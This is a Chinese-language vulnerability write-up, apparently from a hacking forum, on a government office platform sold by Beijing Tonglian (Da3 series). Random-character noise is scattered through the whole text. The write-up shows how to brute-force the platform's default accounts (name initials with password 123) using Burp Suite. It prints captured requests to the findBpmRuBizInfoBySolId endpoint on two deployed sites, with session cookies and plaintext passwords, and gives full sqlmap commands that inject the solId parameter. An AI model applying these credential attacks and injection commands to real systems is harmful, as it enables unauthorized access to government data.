|
; d1 o* k* T5 z, _- O! ~
8 m# B* [5 z* I' G
" q5 ]$ ^ U: c) b, m1 c' T, ~( a D6 T3 e4 q5 E$ @) R7 g
平台简介:
/ R* U6 e2 }6 a
3 v! ]- i% A, g" v
( c/ S- ]9 S- j( E# y* }) {; a ! Q4 ]1 r( d3 B X8 S0 X
/ J$ J |1 Q" g- F. ?& R% Z
/ s/ B+ @6 S. `) F8 \+ H2 k2 r 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。 + G7 ~4 ^7 X( y+ E- F. B/ C
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。 ) T. g3 x/ _5 |7 Z; }1 C
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!% y$ `: }0 @1 O6 {
; R/ P" {; ~1 f
6 Y: |3 ?4 ^( G* c$ ]5 o c8 @ e" h0 @3 f m+ |0 I6 {
5 `6 F3 J7 c7 h, y7 }2 N
- G, Y+ A X5 K 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:4 `4 r. s" w) P" y. W6 |& n
: C+ _, r1 f7 d. }! R' a: a U" n3 ^
! r' u: t% y$ m3 M" v
( w. R4 w! _" q- V' \ 2 Z6 v2 z, O. s* I. t
" j# e6 |2 K0 @2 J http://1.1.1.1:7197/cap-aco/#(案例2-)
6 V8 X/ X; b' H7 E* t; [( b
( S C, d) W; R" x+ q/ B1 I5 ?
http://www.XXOO.com (案例1-官网网站)
' `2 n0 M! l5 W3 Z & L( D% s7 U( C8 W
, w8 Y. |( i5 p8 }2 ?* X+ E9 Q
4 J! T* N* `$ q( T; }: G* O( k
0 H' Q) m) w7 C+ P4 x
7 P$ z2 \% F# v- y) P 漏洞详情:
, X7 C1 k9 W" z$ S) r+ A! H2 v9 g 7 ]1 g( k6 `$ P7 s* X* D, |
+ P' `* n& Y) @ 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试' b# B9 @: v) S5 I* W6 z
$ u' t- g2 n( z0 o0 W! y* I
% A- K5 c4 C2 ]7 }, R+ O- N 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
# U0 D/ P m/ O" u
9 }* u/ S* h1 G5 s5 z- j8 z2 D2 g9 a# L9 t( _
- Z5 ^1 H! y$ i. I% F 1 x6 W: [% U5 O# x5 z2 H* {( f
) L7 ?' ~& \, @1 h. e2 Z/ s
- W4 D, u5 |! @& |; u$ r
' B" f% l+ g% \- Y: p& \- e+ H( \% g/ g: J1 J0 ?
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
* h. n" V+ T; N X 9 T a! Q8 r& j6 z8 d3 J) d
$ o+ x+ w* x9 {) m" _( m$ |
1、案例1-官方网站
$ n" e# L" E* {# d& q0 Z( ]" k; G : A+ o, B& B( R
' w, m7 j. z7 u6 f6 U6 A6 p+ g GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.10 a2 |3 s# ]6 i6 r1 c
, Q& ?% C7 U& l- p$ \
3 n9 }/ O) V2 E6 t ~ Host: www.XXOO.com: D- s: A* E& p% F I
8 Q# {( Z& z3 t" m8 X
7 F Q0 E- d2 m9 e; A2 u) s5 \$ S
Proxy-Connection: Keep-Alive: N m/ N, Y& Q1 a& k
1 t& E2 r2 d, m5 o4 }8 f& R
& Y) v2 k) Y* z. {
Accept: application/json, text/javascript, */*; q=0.01
N& y# ~- X) J0 Q% D 3 J% C$ A# J5 [( [1 N" m0 J2 }
: C, b7 i( _3 L, t# W! P, c8 X$ ]8 s
Accept-Language: zh-CN2 j- r+ D! Z% t& s, ~
2 d" _6 t( b! l) G
' e" ~7 p& T$ d1 V% V Content-Type: application/json
. L- a" h% P5 X a/ C& T - O% M9 u: \# \$ A# x: X# N
- G8 Z* J8 M$ w3 d6 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko! x+ {8 K2 L, u$ c. y8 P
1 y, I( \9 D$ a9 g! H0 A
; c& T$ d. j& v! O' V X-Requested-With: XMLHttpRequest* m! b1 B4 v, j
: d8 _8 X5 N( T- j- e) h
$ ?1 N" n0 h9 Z Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002. Q. `. R* L" v0 y+ z9 j
4 Y5 \8 n8 l( O
$ D# s; w8 H, U0 ^+ u Accept-Encoding: gzip, deflate, sdch
0 F+ l& p4 m1 B ' |+ v* v4 \) D' ~4 U8 q2 o$ z
l+ d5 D7 I8 ? Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e2 o* q- q/ z6 i% e9 [ @
d( v% R( u) ], Z. f$ i
- V* @9 t3 R$ [1 k h1 E1 X8 F; q- q
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:1 n- H, a( S7 T( u
! d g# t; a: \& L% P9 k
( H- Q8 L' ]' v7 Y! `
3 }% J, }4 o8 t [% {
, N) i( k9 h4 O. x! F; `& U" p9 ^/ w2 P% m
7 O' K( f6 x8 |) l& l! V
4 j# ^8 |2 ~" `! u1 C8 t e& {* C
3 U0 r: c& I0 l
2 u J" z! ^( G, K + z- {1 }2 k y
9 }7 D: t+ K/ ~. V, T7 ]8 q: c% b4 Q
# X8 b3 H& M; g% o( y
8 K$ S: \4 a/ z& c1 b) o- z$ \: |! T
! C$ v$ F9 E8 p: _" l& u
2 ]8 P9 k2 q6 g1 }7 c
* j' ~1 v, T4 n1 d
! l" D' j# z3 { 2、案例2-某天河云平台
; }3 w' }5 o1 y+ {) A
( h1 w4 v: V5 q0 L- l) K' C4 C1 q$ A* L
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1& J4 j7 m! C9 X( m
9 B: V8 q* L V/ o# ?, n' W/ X
$ R+ ~7 e! R% d5 C$ W5 Q O/ y Host: 1.1.1.:7197
5 B1 v; n1 b- H
3 g a: C8 I E d
# z" C$ n1 t) l& B! {! x6 V- a Accept: application/json, text/javascript, */*; q=0.01# l6 k2 r0 e8 L9 t& l1 i
" G! Y: H$ m& z) F, i, k
! M3 g, u. Z8 Q
X-Requested-With: XMLHttpRequest
0 G* O2 _; Q9 K# P2 L7 D
- e4 V& _6 Z5 i1 m, U2 j% \- B' P. `. w4 m$ ~& w% o/ M
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
; e6 @" b* B. K9 ~# L
- J; z5 Q, L1 j$ v& a& ]: w. {5 p
4 K, I7 |2 c2 {# k# t Content-Type: application/json) z, X, D$ E& l) ~) P1 o
: k/ `8 ^% P* I1 U- C) d) y+ m% L1 [. x, C; d- D7 ~- A+ f/ H
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 t' X& j/ l5 Z
" c% D0 S1 D2 V2 X
+ F) o5 ^5 M3 H% y/ K/ `
Accept-Language: zh-CN,zh;q=0.8- u1 k/ Y5 G v! D
, {, I a3 @6 p
4 j/ ?' z0 i+ \! `. T Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=15 k) l* \. f5 T1 O! M
! o" j f4 K% L7 @# b. G8 \" Q
1 A8 Z" {) `# B Connection: close" R J7 B2 T% U1 K1 u+ E: i
! x- ~8 ~/ b: S$ L) V/ v2 H
. Q: h6 o- t8 N" m( m$ C# `9 z0 c: E 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
1 `. W( b0 F0 P( e / f) Z5 u) A, E9 D0 l/ P
1 m3 e- D1 o" U, X& ^
& J) h! b( q, u. V S; j5 @& A5 s3 w . R* T: s- z" ^- z. v' j, c
; C g3 m) b# K! |( C ; y6 [/ b; F% ~( d
|